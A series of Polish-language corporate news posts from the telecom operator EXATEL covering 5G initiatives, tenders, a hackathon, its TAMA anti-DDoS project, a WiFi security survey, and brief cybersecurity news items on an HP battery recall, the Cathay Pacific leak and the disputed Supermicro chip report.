Mówiąc o SDNcore nie można pominąć jego roli w nadchodzącej rewolucji 5G. Tego typu rozwiązania przesądzą, czy łączność bezprzewodowa piątej generacji szybko pojawi się w codziennym użytku.

5G to nie tylko większe przepustowości transmisji danych na naszych mobilnych urządzeniach. To przede wszystkim wsparcie dla milionów urządzeń na małych przestrzeniach, ekstremalna niezawodność oraz niskie opóźnienia w komunikacji terminal-sieć. Jeśli chcemy to osiągnąć, musimy znacząco zmodernizować obecnie wykorzystywane technologie. Konieczne są rozwiązania wykorzystujące SDN, NFV (ang. Network Functions Virtualisation, wirtualizacja funkcji sieci) czy automatyzacje procesów zarządzania (tzw. orkiestracja). Odpowiedzią są właśnie urządzenia takie jak SDNcore. Co ważne, to rozwiązanie umożliwi również wsparcie dla network slicing – kluczowy element wdrożenia operatora hurtowego i wspólnej sieci #Polskie5G – podkreśla Michał Szczęsny.

EXATEL – innowacyjność w praktyce

SDNcore to nie jedyny projekt badawczo-rozwojowy EXATEL. W ramach europejsko-japońskiego konsorcjum RAPID5G w lipcu 2017 roku przeprowadziliśmy pierwsze w Europie testy technologii 5G w przestrzeni publicznej. Ten sukces zaowocował powstaniem oddzielnego zespołu badawczo-rozwojowego w strukturach firmy. Dziś w jego skład wchodzą naukowcy, programiści, architekci, analitycy, inżynierowie sieci oraz osoby na co dzień zarządzające projektami. Dzięki ich pracy na początku listopada br. zakończyliśmy 18-miesięczne prace nad autorskim rozwiązaniem chroniącym przed atakami wolumetrycznymi – TAMA. W efekcie powstał polski anty-DDoS klasy operatorskiej, którego komercjalizacja przewidziana jest na grudzień tego roku.

Rok temu tj. 28 sierpnia 2018 roku podpisaliśmy także umowę na budowę programowalnego urządzenia brzegowego – SDNbox. W przeciwieństwie do SDNcore to rozwiązanie przeznaczone jest do obsługi komunikacji pomiędzy siecią operatorską a infrastrukturą klienta (jego biurem, sklepem, zakładem produkcyjnym). W zależności od wgranego do SDNbox oprogramowania, będzie ono mogło pełnić diametralnie różne funkcje – router, przełącznik, moc obliczeniowa na brzegu sieci czy element ochrony przed cyberzagrożeniami. Całość zakończy się w 2021 roku.

#Polskie5G nabiera kształtów

Polski Fundusz Rozwoju, EXATEL oraz przedstawicie komercyjnych przedsiębiorstw telekomunikacyjnych podpisali dziś w siedzibie Ministerstwa Cyfryzacji memorandum w sprawie analizy modelu biznesowego dla spółki #Polskie5G.

Celem tej inicjatywy jest zapewnienie dostępu do usług 5G w całej Polsce. Dzięki temu użytkownicy będą mieli możliwość swobodnego korzystania z sieci w dowolnym miejscu i czasie.

Technologia 5G w dzisiejszych czasach jest jednym z fundamentów rozwoju gospodarki. W kontekście sieci piątej generacji nie możemy używać tylko argumentów związanych z jej szybkością. To, przede wszystkim, olbrzymie możliwości dla przemysłu, rozwoju miast, nowoczesnego transportu czy całego spektrum usług związanych z medycyną – podkreślił minister cyfryzacji Marek Zagórski podczas spotkania.

Przedsięwzięcie ma pozwolić na obniżenie kosztów budowy infrastruktury telekomunikacyjnej, a co za tym idzie wprowadzenie konkurencyjnych cen usług. Wśród priorytetów określonych w podpisanym dziś memorandum są też także zapewnienie infrastruktury pozwalającej na rozwój gospodarki cyfrowej, a także zapewnienie wysokiego poziomu cyberbezpieczeństwa.

Memorandum #Polskie5G to początek nowej epoki w historii cyfryzacji Polski. Dziś pokazaliśmy, że polityka budowy cybersuwerenności naszego kraju opiera na współpracy operatorów państwowych i prywatnych, krajowych i zagranicznych. Przed nami i naszymi partnerami jeszcze dużo pracy, ale jest przekonany projekt #Polskie5G będzie lekcją dla innych krajów, że można budować cybersuwerenność bez zamykania się państwa na sektor prywatny i firmy zagraniczne. – powiedział po spotkaniu Nikodem Bończa Tomaszewski, prezes EXATEL.

W sygnowanym dokumencie wszystkie strony zadeklarowały chęć współpracy w zakresie analizy koncepcji powołania #Polskie5G – jednego hurtowego operatora ogólnopolskiej bezprzewodowej sieci łączności mobilnej w standardzie 5G, pracującego w pasmie 700 MHz.

Podpisanie memorandum #Polskie5G to początek drogi do rozwiązania podstawowych problemów telekomunikacyjnych Polski, takich jak brak zasięgu sieci mobilnych na całym terenie kraju czy brak Bezprzewodowej Sieci Łączności Specjalnej dla Sił Zbrojnych RP, służb mundurowych, służb ratowniczych oraz infrastruktury krytycznej. Wspólna infrastruktura #Polskie5G to też niższe koszty budowy i eksploatacji sieci oraz niższa emisja elektromagnetyczna niż w przypadku budowy kilku sieci oddzielnie – dodaje Bończa Tomaszewski.

Uzgodnienia wypracowane w ramach grup roboczych zostaną przekazane premierowi i ministrowi cyfryzacji.

Memorandum podpisali: prezes Polskiego Funduszu Rozwoju – Paweł Borys i jego zastępca Tomasz Fill, prezes firmy EXATEL – Nikodem Bończa Tomaszewski, prokurent tejże firmy Michał Szczęsny, członek zarządu Orange – Witold Drożdż, członek rady nadzorczej Polkomtela – Wojciech Pytel oraz członek zarządu T-Mobile – Włodzimierz Nowak. Podczas uroczystości obecny był Marek Zagórski, minister cyfryzacji oraz Małgorzata Zakrzewska – przedstawicielka firmy P4.

Podczas spotkania ustalono kolejne zebranie grupy roboczej.

Ogłoszenie przetargu na sprzedaż floty samochodowej EXATEL

Ogłaszamy przetarg na sprzedaż floty samochodowej EXATEL. Ogłoszenie dotyczy 51 używanych w firmie auta osobowe marki Hyundai. Zapraszamy do składania ofert.

 

Rodzaj przetargu

Przetarg pisemny nieograniczony.

 

Przedmiot przetargu

Sprzedaż łączna aktywów trwałych w postaci samochodów osobowych dalej określanych jako „Flota samochodowa”.

 

Szczegółowe informacje

Szczegółową i pełną treść ogłoszenia wraz z załącznikami załączamy poniżej:

Sprzedaż Floty samochodowej EXATEL S.A.- ogłoszenie_14.10.2019 – wersja pdf wraz z załącznikami:

  • nr 1 do Ogłoszenia – Flota samochodowa oferowana do sprzedaży przez EXATEL_14.10.2019 – wersja pdf
  • nr 2 do Ogłoszenia – Formularz oferty_14.10.2019 – wersja pdf lub wersja doc
  • nr 3 do Ogłoszenia – Oświadczenie_14.10.2019 – wersja pdf lub wersja doc
  • nr 4 do Ogłoszenia – Informacja o przetwarzaniu danych_14.10.2019 – wersja pdf lub wersja doc
  • nr 5 do Ogłoszenia – wzór umowy sprzedaży_14.10.2019 – wersja pdf

 

***

O EXATEL

EXATEL to polski operator telekomunikacyjny oraz dostawca usług teleinformatycznych (ICT) i cyberbezpieczeństwa. Powstał w 2004 roku w wyniku fuzji spółek Telbank i Tel-Energo. Zbudował i zarządza jedną z największych sieci światłowodowych w Polsce, liczącą ponad 20 500 km. Tworzy rozwiązania dla biznesu, innych operatorów oraz sektora publicznego. Dostarcza transmisję danych we wszystkich polskich bankach komercyjnych i 83 spółkach sektora energetycznego. Zaprojektował i zbudował sieć OST do łączności administracji rządowej. Zarządza połączeniami z 305 operatorami krajowymi i 136 zagranicznymi. Jest obecny w międzynarodowych punktach wymiany ruchu w Londynie, Frankfurcie, Amsterdamie, Moskwie i Kijowie. Od 2017 roku należy w pełni do Skarbu Państwa, jest nadzorowany przez Ministra Obrony Narodowej.

Hakaton EXATEL – główna nagroda dla zespołu MMM

Na zakończonej wczoraj 3. edycji HackYeah hakaton na najlepsze oprogramowanie do kategoryzacji informacji wygrała grupa MMM. Ich projekt Uncategorized Data Exploration Tool (UDET) pokonał 6 innych finałowych rozwiązań. A jego autorzy zdobyli nagrodę w wysokości 10 000 złotych.

EXATEL – DATA CATEGORIZING SOFTWARE

Jeśli czegoś na świecie przybywa, to na pewno przybywa danych. Ich ilość rośnie w tempie zawrotnym.  Zmieniają się też metody ich analizy. Tradycyjne narzędzia niestety przestają działać, są zbyt kosztowne i mało skuteczne.

Dlatego celem zadania EXATEL było opracowanie mechanizmu opartego na uczeniu maszynowym. Takie, które zajmowałoby się sortowaniem danych na te nieistotne i na te, którym powinien przyjrzeć się człowiek. Innymi słowy – nauczenie programu oceniania treści danych.

24 godzin pracy

Do zadania przystąpiło kilkanaście drużyn, nie tylko z Polski. W czasie tylko jednej doby musieli zrozumieć dobrze zadanie, dokonać analizy danych (20GB zawierających ponad 3,5 miliona dokumentów tekstowych) oraz przygotować działające rozwiązanie. Do pomocy mieli także 3 mentorów oraz członków jury EXATEL – Piotra Dudzica, Tomasza Fortunę oraz Piotra Mierzwińskiego. I nieprzekraczalny deadline na godzinę 12.00 w niedzielę.

3 godziny pracy jury

Po godzinie obrad do finału jury EXATEL zakwalifikowało 7 projektów. Każdy zespół miał 12 minut na przedstawienie swojego rozwiązania. Musiał także udowodnić, że mechanizm działa poprawnie. Jednak poziom uczestników był tak wysoki, a rywalizacja zacięta, że obrady skończyły się dosłownie minutę przed 15 – czyli tuż przed rozpoczęciem ceremonii wręczenia nagród. Zwycięzca mógł być tylko jeden…

Hakaton EXATEL - lista finalistów

MMM zgarnęło 10 000 złotych

… i była nim drużyna MMM ze swoim rozwiązaniem Uncategorized Data Exploration Tool (UDET). Rozwiązaniem w pełni funkcjonalnym. Takim, który w locie przeszukiwał bazę i umożliwiał wyszukiwanie po kategoriach, ID dokumentu, frazach itp. Co ważne – opatrzonym prostym i czytelnym panelem użytkownika. W tym wypadku jury było zgodne, że właśnie do MMM nagroda trafić powinna. I tak też się stało za co jeszcze raz zwycięzcom serdecznie gratulujemy!

Wręczenie nagród zespołowi MMM

PPK – zaproszenie do składania ofert

Zapraszamy do składania ofert dotyczących zarządzania pracowniczym planem kapitałowym (PPK) oraz prowadzenia pracowniczego planu kapitałowego z EXATEL. Szczegółową i pełną treść Zaproszenia załączamy poniżej.

Zaproszenie do składania ofert – PPK EXATEL

 

***

O EXATEL

EXATEL to polski operator telekomunikacyjny oraz dostawca usług teleinformatycznych (ICT) i cyberbezpieczeństwa. Powstał w 2004 roku w wyniku fuzji spółek Telbank i Tel-Energo. Zbudował i zarządza jedną z największych sieci światłowodowych w Polsce, liczącą ponad 20 500 km. Tworzy rozwiązania dla biznesu, innych operatorów oraz sektora publicznego. Dostarcza transmisję danych we wszystkich polskich bankach komercyjnych i 77 spółkach sektora energetycznego. Zaprojektował i zbudował sieć OST do łączności administracji rządowej. Zarządza połączeniami z 300 operatorami krajowymi i 135 zagranicznymi. Jest obecny w międzynarodowych punktach wymiany ruchu w Londynie, Frankfurcie, Amsterdamie, Moskwie i Kijowie. Od 2017 roku należy w pełni do Skarbu Państwa, jest nadzorowany przez Ministra Obrony Narodowej.

 

Projekt TAMA – Zaproszenie do składania ofert na dostawę serwerów

Zapraszamy do składania ofert na dostawę serwerów dla projektu TAMA. Szczegóły oraz wymagania znajdują się poniżej.

Zaproszenie do konkursu ofert do projektu TAMA

 

Czym jest TAMA

To opracowywany w Polsce system ochrony przed cyberatakami typu DDoS klasy operatorskiej. Projekt TAMA będzie wykorzystywał algorytmy i technologie opracowywane przez EXATEL przy współpracy z Politechniką Warszawską. Wkładem naszej firmy będzie także zaawansowana infrastruktura sieciowa oraz doświadczony zespół specjalistów od projektów IT, cyberbezpieczeństwa (SOC) i telekomunikacji. Sam projekt współfinansuje Narodowe Centrum Badań i Rozwoju (NCBiR) w ramach programu CyberSecIdent – Cyberbezpieczeństwo i e-Tożsamość.

Badania i rozwój

Projekt TAMA antyDDoS to już drugi projekt działu R&D EXATEL, który ujrzał światło dzienne. Pierwszym był RAPID 5G realizowany z grupą instytucji z UE i Japonii. W jego ramach przeprowadziliśmy pierwsze w Polsce testy terenowe technologii 5G.

Projektów badawczo-rozwojowych w laboratoriach EXATEL jest znacznie więcej. Część z nich prowadzimy samodzielnie, na wewnętrzne potrzeby firmy. Liczymy, że o innych naszych projektach będzie można usłyszeć już niebawem. O naszej pracy możesz przeczytać w zakładce badania i rozwój.

Tworzymy. Nie odtwarzamy

EXATEL jest jednym z największych polskich operatorów telekomunikacyjnych. Zajmujemy się także cyberbezpieczeństwem, produkcją oprogramowania oraz badaniami i rozwojem (R&D). Właśnie R&D jest najszybciej rozwijającym się działem EXATEL i tu otwiera się wiele nowych, unikalnych możliwości rozwoju kariery. Ofert pracy w branży IT jest dużo, jednak miejsc, w których faktycznie tworzy się nowe technologie i wdraża je na rynek jest mało.

Chcesz dołączyć do naszego zespołu R&D – sprawdź dostępne oferty pracy.

Cyber blog

Sprawdź, czy HP wymieni Twoją baterię

Na początku tego roku firma HP powiadomiła o uruchomieniu globalnego, dobrowolnego programu wymiany baterii. Dotoczy to wybranych notebookach i przenośnych stacjach roboczych. Wynika to z potencjalnego przegrzewania się tych elementów. A to z kolei oznacza ryzyko poparzenia użytkownika bądź wywołania pożaru.

Modele objęte programem

Programem objęte są akumulatory w HP Probook 64x (G2 i G3), HP ProBook 65x (G2 i G3), HP x360 310 G2, HP ENVY m6, HP Pavilion x360, notebookach HP 11 i przenośnych stacjach roboczych HP Zbook (17 G3, 17 G4 oraz Studio G3). Dotyczy to sprzętów sprzedawanych na całym świecie pomiędzy grudniem 2015 a grudniem 2017. Wymiana obejmuje również baterie sprzedawane jako akcesoria lub montowane jako części wymienne przez serwis.

Jak przebiega wymiana

Na stronie producenta dostępna jest aplikacja umożliwiająca weryfikację czy posiadana bateria jest objęta wymianą. Po wykryciu wadliwej baterii producent zaleca wykonanie specjalnie przygotowanej aktualizacji BIOSu. Tak, by system umożliwił programowe odłączenie akumulatora. Kolejnym krokiem jest wezwanie technika, który dokona wymiany baterii. Do tego czasu korzystanie z laptopa jest możliwe tylko po podłączeniu zewnętrznego zasilania (sieciowego).

 

Źródło: hp.com

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Raport – bezpieczeństwo WiFi w oczach polskich przedsiębiorstw

Większość organizacji w Polsce, choć korzysta z sieci bezprzewodowych (WiFi), nie wykorzystuje w pełni ich potencjału – wynika z najnowszego raportu IDC, przygotowanego na zlecenie Cisco i EXATEL.

Sieci bezprzewodowe już od kilkunastu lat są standardem wykorzystywanym zarówno w biznesie, jak i coraz częściej w jednostkach administracji publicznej. Powszechność stosowania tej technologii sprawia jednak, że organizacje nie postrzegają jej jako narzędzia umożliwiającego oferowanie nowych, innowacyjnych usług. Istnieje też wiele, często nieuzasadnionych, obaw o jej bezpieczeństwo.

Tymczasem, jak wynika z najnowszego raportu IDC, infrastruktura WLAN jest jednym z kluczowych filarów tworzenia strategii transformacji cyfrowej w biznesie oraz usługach publicznych i jednostkach administracji. Umożliwia nie tylko budowę rozwiązań opartych o Internet rzeczy (IoT), ale także wdrażanie modeli wielokanałowej sprzedaży (omnichannel), kontaktu z mieszkańcami i regularnego dostępu do usług w modelu SaaS bez ograniczeń.

Rozwiązania sieci bezprzewodowej z powodzeniem są coraz chętniej wykorzystywane nie tylko w sektorze bankowym, energetycznym czy transporcie. Wychodząc naprzeciw przyzwyczajeniom obywateli, sięga po nie także administracja publiczna. Co ważne, sami dostawcy technologii coraz lepiej rozumieją nowe zasady gry, wprowadzając i promując np. narzędzia do zarządzania środowiskiem sieciowym w chmurze.

Badanie IDC, Cisco i EXATEL wykazało, że 2/3 polskich organizacji udostępnia sieć WiFi pracownikom, gościom czy klientom. Aż w 95,5% przypadków sieć WiFi jest przeznaczona do użytku pracowników, a w 73,5% udostępniana jest gościom danej organizacji.

Sieci bezprzewodowe można eksploatować na wiele różnych sposobów, często wychodzących poza stereotypowy dostęp do Internetu. Katalog możliwości, jakie daje WiFi jest obszerny, począwszy od inteligentnych budynków (gdzie możliwe do zastosowania scenariusze to nawigacja wewnątrz budynków czy zarządzanie aktywami), po wsparcie systemów obsługi klientów lub mieszkańców. Co ciekawe, aż 41 proc. respondentów badania IDC jest zdania, że rozwiązania bezprzewodowe budują pozytywny wizerunek organizacji.

Pierwszym krokiem do pozbycia się kabli jest… bezpieczeństwo

Sieci bezprzewodowe WLAN powinny być niezbędnym elementem polityki bezpieczeństwa w każdej organizacji. Aby jednak podróż w „bezprzewodowym” kierunku przebiegła pomyślnie, przedsiębiorstwa muszą na nowo zdefiniować kwestię bezpieczeństwa IT oraz postawić ją na czele listy priorytetów. Nowocześnie rozumiane bezpieczeństwo, w ujęciu holistycznym, stanowi bowiem podstawę każdej strategii transformacji cyfrowej.

Ważne, aby już u podstaw wszystkich działań związanych z wykorzystaniem sieci bezprzewodowych leżało cyberbezpieczeństwo. Badania oraz praktyki rynkowe pokazują, że pełne monitorowanie przestrzeni radiowej pozwoli uchronić firmę od cyberataku lub innych zagrożeń w sieci. Tymczasem jedynie 48 proc. dyrektorów, kierowników oraz specjalistów odpowiedzialnych za infrastrukturę IT lub sieciową, którzy wzięli udział w badaniu przyznaje, że ich organizacje monitorują sieć radiową organizacji. Niestety oznacza to, że ponad połowa (52 proc.) firm nie wprowadza takich praktyk, mimo tego, że jest to zdecydowanie najbardziej skuteczna i proaktywna metoda wykrywania niebezpiecznych zdarzeń w sieci, oferowana przez współczesne rozwiązania WLAN – mówi Przemysław Kania, dyrektor generalny Cisco w Polsce.

Tymczasem badanie IDC, Cisco i EXATEL pokazuje, że głównym narzędziem zapewniającym bezpieczeństwo w firmach jest fizyczne odseparowanie sieci bezprzewodowej od LAN (78,8 proc.)

Najlepsza praktyka z zakresu cyberbezpieczeństwa jest zasada ograniczonego zaufania. Do wszystkiego – czy to jest łącze przewodowe czy bezprzewodowe. Fizyczna separacja jest dobrym rozwiązaniem, ale jednym z tych ostatecznych. Bo – jako organizacja – ograniczamy wtedy mobilność naszych pracowników. Przywiązujemy ich do stanowisk pracy. A nie jest to konieczne. Dobrze zaprojektowana i zabezpieczona sieć bezprzewodowa może być traktowana na równi z „kablem”. Do tego trzeba jednak odpowiednich narzędzi i wiedzy w postaci monitoringu sieci oraz ruchu, VPN-ów, czy odpowiedniej konfiguracji dostępów. Nie każda organizacja może to wykonać samodzielnie. Ale dzięki outsourcingowi te kompetencje można dość prosto pozyskać – mówi Jakub Syta, dyrektor Departamentu Cyberbezpeiczeństwa w EXATEL

Kluczowe dane dotyczące stosowania zabezpieczeń sieci WiFi:

  • 87 proc. badanych oczekuje, że WiFi samo w sobie będzie bezpieczne.
  • 79 proc. uczestników badania przyznaje, że w ich organizacji sieć WiFI jest odseparowana od sieci wewnętrznej.
  • Uwierzytelnianie oraz autoryzowanie dostępu użytkowników jest istotne dla 79 proc. ankietowanych.
  • Prawie połowa (48 proc.) wskazało na identyfikowanie i monitorowanie zagrożeń w przestrzeni radiowej.
  • 12 proc. osób, które brały udział wskazała na inne zabezpieczenia.

Kluczowe wnioski z badania w zakresie ułatwienia pracy przez WLAN:

  • Ułatwienie pracy pracownikom jest istotne dla 65 proc. uczestników badania.
  • 61 proc. wskazuje na ułatwienie dla klientów i gości.
  • 41 proc. zaznacza korzyści wizerunkowe (np. Przyjazne Państwo).
  • Redukcja kosztów operacyjnych związanych z częstą przebudową sieci LAN jest istotna dla 27 proc. osób.
  • 14 proc. wskazuje na funkcje analityczne.

Bez wątpienia bezpieczne sieci bezprzewodowe są równie istotne, co bezpieczne sieci LAN. Tym bardziej, że w niedalekiej przyszłości to bezprzewodowy dostęp do sieci będzie podstawowym modelem korzystania z Internetu. Badanie IDC przeprowadzone we współpracy z Cisco i EXATEL pokazuje jednak, że rynek wciąż wymaga edukacji i namacalnych przykładów wdrożeń. Jego ewolucję przyspieszają zmieniające się modele pracy, wzrost mobilności i nowych form dostępu do aplikacji biznesowych etc. Dlatego istotnym elementem jest inspiracja decydentów na temat tego, jak tworzyć nowe usługi dla biznesu w oparciu o bezpieczne sieci WiFi i jak w pełni wykorzystać ich potencjał.

Pełna wersja raportu dostępna jest tutaj.

Aktualizacja | Projekt TAMA – zaproszenie do składania ofert na audyt zewnętrzny

Zapraszamy do składania ofert na przeprowadzenie audytu zewnętrznego projektu TAMA . Szczegóły oraz wymagania znajdują się poniżej.

Zapytanie ofertowe Audyt

 

AKTUALIZACJA z dnia 29 marca 2019 r.

W związku z pytaniami, poniżej publikujemy je wraz z naszą odpowiedzią

Pytania i odpowiedzi

Pytania i odpowiedzi z dnia 4 kwietnia 2019 roku

 

Czym jest TAMA

To opracowywany w Polsce system ochrony przed cyberatakami typu DDoS klasy operatorskiej. Projekt TAMA będzie wykorzystywał algorytmy i technologie opracowywane przez EXATEL przy współpracy z Politechniką Warszawską. Wkładem naszej firmy będzie także zaawansowana infrastruktura sieciowa oraz doświadczony zespół specjalistów od projektów IT, cyberbezpieczeństwa (SOC) i telekomunikacji. Sam projekt współfinansuje Narodowe Centrum Badań i Rozwoju (NCBiR) w ramach programu CyberSecIdent – Cyberbezpieczeństwo i e-Tożsamość.

Badania i rozwój

Projekt TAMA antyDDoS to już drugi projekt działu R&D EXATEL, który ujrzał światło dzienne. Pierwszym był RAPID 5G realizowany z grupą instytucji z UE i Japonii. W jego ramach przeprowadziliśmy pierwsze w Polsce testy terenowe technologii 5G.

Projektów badawczo-rozwojowych w laboratoriach EXATEL jest znacznie więcej. Część z nich prowadzimy samodzielnie, na wewnętrzne potrzeby firmy. Liczymy, że o innych naszych projektach będzie można usłyszeć już niebawem.

Tworzymy. Nie odtwarzamy

EXATEL jest jednym z największych polskich operatorów telekomunikacyjnych. Zajmujemy się także cyberbezpieczeństwem, produkcją oprogramowania oraz badaniami i rozwojem (R&D). Właśnie R&D jest najszybciej rozwijającym się działem EXATEL i tu otwiera się wiele nowych, unikalnych możliwości rozwoju kariery. Ofert pracy w branży IT jest dużo, jednak miejsc, w których faktycznie tworzy się nowe technologie i wdraża je na rynek jest mało.

Chcesz dołączyć do naszego zespołu R&D – sprawdź dostępne oferty pracy.

EXATEL podpisał list intencyjny z UMCS w Lublinie

Dnia 22 lutego podpisaliśmy listy intencyjny o współpracy z Uniwersytetem Marii Curie-Skłodowskiej w Lublinie (UMCS). Jej celem jest współpraca w zakresie projektów badawczo-rozwojowych (B+R) oraz wymiany wiedzy i doświadczeń w zakresie teleinformatyki oraz cyberbezpieczeństwa. To kolejna placówka edukacyjna, z którą chcemy kształcić przyszłych ekspertów.

Jednym z głównych problemów polskiego cyberbezpieczeństwa jest niewystarczająca liczba specjalistów. Większość obecnych pracowników to samoucy, którzy swoje umiejętności zdobyli w praktyce. Dlatego EXATEL od kilku lat aktywnie wspiera inicjatywy, których celem jest uruchamianie specjalizacji w szkołach i na uczelniach. Efektem tego typu działań jest podpisany 22 lutego przez rektora UMCS prof. Stanisława Michałowskiego oraz wiceprezesa EXATEL Rafała Magrysia list intencyjny.

Zrównoważony rozwój

EXATEL to przede wszystkim firma działająca na niezwykle konkurencyjnym rynku B2B. Ale to także spółka skarbu państwa, która nie może zapominać o zrównoważonym rozwoju – jednym z kluczowych aspektów w rozwoju naszego państwa.

UMCS to dołącza do grona placówek, które pomogą nam urzeczywistnić wizję dobrze zaplanowanego procesu szkolenia ekspertów z teleinformatyki. Jako praktycy widzimy, jak bardzo potrzebna jest wykwalifikowana kadra. Już dziś jest duże zapotrzebowanie na fachowców m.in. w dziedzinie cyberbezpieczeństwa.  Rozumiejąc rosnącą rolę technologii IT dla bezpieczeństwa biznesu oraz Państwa, jestem wręcz przekonany, trend ten będzie się nasilał – powiedział Rafał Magryś, wiceprezes zarządu EXATEL.

Co ważne – to kolejna jednostka edukacyjna w Polsce południowo-wschodniej, z którą EXATEL aktywnie współpracuje. Wcześniej, bo w 2017 roku, wspólnie z Zespołem Szkół Technicznych i Ogólnokształcących w Jarosławiu stworzyliśmy pierwszą w tamtym rejonie klasą specjalistyczną o profilu teleinformatycznym.

Cieszymy się, że uczelnie chcą korzystać z naszej wiedzy. Jesteśmy praktykami teleinformatyki i cyberbezpieczeństwa i te usługi dostarczamy dla naszych klientów biznesowych oraz z sektora publicznego. Wiemy, że to właśnie wiedzy zdobywanej w trakcie naszej codziennej pracy najbardziej potrzebują młodzi ludzie – dodaje Magryś.

Łączymy biznes z edukacją

Oprócz edukacji ważnym elementem współpracy EXATEL i UMCS będą wspólne projekty badawczo-rozwojowe.

Nauka ma potencjał. W Polsce prowadzone są badania na światowym poziomie. Zwłaszcza tam, gdzie wystarczy teoria i nie potrzeba złożonych laboratoriów za duże pieniądze. Podstawowy powód, aby łączyć naukę i biznes jest, że są one sobie nawzajem potrzebne. Uczelnie mogą odpowiadać na potrzeby biznesu, mogą przyczynić się do sukcesu w realizacji nowych projektów, zaś przemysł wskazuje uczelni jakich kadr i jakich badań podstawowych i aplikacyjnych potrzebuje – mówił w zeszłym roku w wywiadzie dla Rzeczpospolitej dr inż. Teodor Buchner, ekspert ds. projektów badawczo-rozwojowych w EXATEL.

Ważne jest, że obie instytucje mają bogate doświadczenie w tej dziedzinie. Uniwersytet lubelski m.in. od 1978 roku prowadzi badania dotyczący łączy optycznych, stając się tym samym jednym z pionierów nowoczesnej telekomunikacji. Z kolei w EXATEL pracujemy obecnie nad 3 projektami B+R. Pierwszym z nich jest projekt polskiego antyDDoS klasy operatorskiej TAMA, który realizujemy wspólne z Politechniką Warszawską. Innym przykładem jest SDBbox – programowalne urządzenie sieciowe. W zależności od mechanizmów sterownika czy wgranego oprogramowania, może pełnić diametralnie różne funkcje – router, przełącznik, serwer, element ochrony przed cyberzagrożeniami. A to dopiero początek.

Cyber blog

Wyciek danych 9,4 mln pasażerów Cathay Pacific

Wyciek danych (data leak) to jeden z częstszych problemów cyberbezpieczeństwa współczesnego biznesu. Boleśnie przekonały się o tym linie lotnicze Cathay Pacific, które w środę poinformowały o nieautoryzowanym dostępie do danych swoich klientów. Wg. mediów chodzi o informacje o około 9,4 mln pasażerów przewoźnika z Hongkongu. Wśród danych były m.in. informacje z paszportów, dowodów tożsamości czy kart kredytowych.

Koszty skutecznego cyberataku

W cyberbezpieczeństwie realna wycena strat związanych z incydentem cyberbezpieczeństwa zawsze jest trudna. Jednak nie oznacza to, że jest to niemożliwe (m.in. mówił o Adam Haertle podczas EXATEL Security Days w prelekcji „Ile kosztuje incydent – studium przypadku”). Tak jest i w tym przypadku. Bo pierwsze negatywne skutki już znamy. Wystarczy spojrzeć na wyceną akcji Cathay Pacific, która spadła o 7 procent (co możne oznaczać stratę nawet 201 milionów dolarów z wartości rynkowej przedsiębiorstwa). Co więcej – mocny spadek akcji tego światowego giganta odbił się także na Hang Seng Indeks (HSI) czyli indeksie reprezentującym 33 największe przedsiębiorstwa pod względem kapitalizacji na Giełdzie Papierów Wartościowych w Hongkongu. I ten indeks zaliczył spadek o prawie 2%.

Nie tylko Cathay Pacific

Często źródłem wycieków danych jest błąd ludzki lub podatność w oprogramowaniu. Przekonał się o tym niedawno inny przewoźnik lotniczy – British Airways. To z jego aplikacji pomiędzy 21 sierpnia a 5 września 2018 roku wyciekły dane około 380 tysięcy klientów. Informacje dotyczyły kart kredytowych, którymi pasażerowie BA dokonywali transakcji u brytyjskiego przewoźnika. Z kolei pod koniec września Facebook poinformował, iż dzięki luce w systemie zagrożonych było ponad 50 milionów kont.

 

Źródło: Reuters

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Dodatkowy chip w produktach Supermicro

Wczoraj wieczorem świat obiegała informacja Bloomberga dotycząca produktów Supermicro. Według dziennikarzy chiński producent potajemnie umieszczał dodatkowy chip na swoich płytach głównych dla serwerów. Zdaniem dziennikarzy było to celowe działanie wspierane przez chińskie władze. “Wzbogacone” podzespoły trafiły do jednostek rządowych w USA oraz kilkudziesięciu kluczowych amerykańskich firm technologicznych.

Supermicro – gigant z dalekiego wschodu

Supermicro to wywodząca się z Chin firma, która jest największym graczem w zakresie produkcji płyt głównych dla serwerów. Co ważne – firma ta dominuje także na rynku płyt przeznaczonych do użytku specjalnego. Chodzi o rozwiązania takie jak maszyny do rezonansu magnetycznego czy systemy uzbrojenia. W Stanach Zjednoczonych z produktów Supermicro korzystały lub nadal korzystają firmy takie jak Apple czy Amazon. Podzespoły także były używane także przez służby takie jak CIA oraz marynarka wojenna.

Chip, który podsłuchuje

Zgodnie z doniesieniami dziennikarzy Bloomberga cała sprawa wyszła na jaw przypadkiem. Źródłem informacji o niezidentyfikowanym elemencie płyty głównej był Amazon, który dokonał dokładnej analizy kupowanych przez siebie podzespołów. To właśnie wtedy wykryto dodatkowy chip wielkości ziarnka ryżu, który mógł modyfikować jądro systemu operacyjnego. Jakby tego było mało, podobnego odkrycia miał dokonać inny amerykański gigant – Apple. Według doniesień Bloomberga także tamtejsi specjaliści zauważyli anomalnie w działaniach wykorzystywanych systemów. Amerykańscy dziennikarze podają, że następstwem tych odkryć było zerwanie współpracy obu amerykańskich firm z Supermicro oraz pozbycie się przez nich wszelkich podzespołów chińskiego producenta.

Znaki zapytania

Bez wątpienia informacja ta wstrząsnęła całym światem. Jednak pojawiły się także liczne znaki zapytania co do całej sytuacji. Po pierwsze – zarówno Amazon, jak i Apple oficjalnie zdementowały, iż takowa sytuacja w ogóle miała miejsce. Po wtóre – sam materiał wskazywał niewiele konkretów takich jak sposób działania chipa, jego rzeczywiste zdjęcia czy choćby dokumenty potwierdzające opisywaną sytuację. Nie oznacza to jednak, że wydarzenie to nie miało w ogóle miejsca. W końcu znane są przypadki, gdzie “nadprogramowe” podzespoły popularnych urządzeń odpowiedzialne były za przełamanie systemów bezpieczeństwa lub wyciek danych. O tego typu zagrożeniach opowiadała także Joanna Rutkowska podczas tegorocznej edycji EXATEL Security Days. Wideo z jej wystąpienia pt. Security through Distrusting można obejrzeć tutaj.

 

Źródło: Bloomberg

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

EXATEL na FE w Krynicy oraz MSPO w Kielcach

Już jutro, tj. 4 września, rozpoczynają się dwa wielkie wydarzenia – Forum Ekonomiczne w Krynicy oraz Międzynarodowy Salon Przemysłu Obronnego w Kielcach. Pierwsze wydarzenie to spotkanie polityki i biznesu nie tylko z Polski, ale i z całej Europy. Targi kieleckie to z kolei miejsce, gdzie rozmawiają eksperci, producenci i wystawcy związani z przemysłem obronnym. Naturalnie EXATEL będzie obecny na obu tych wydarzeniach.

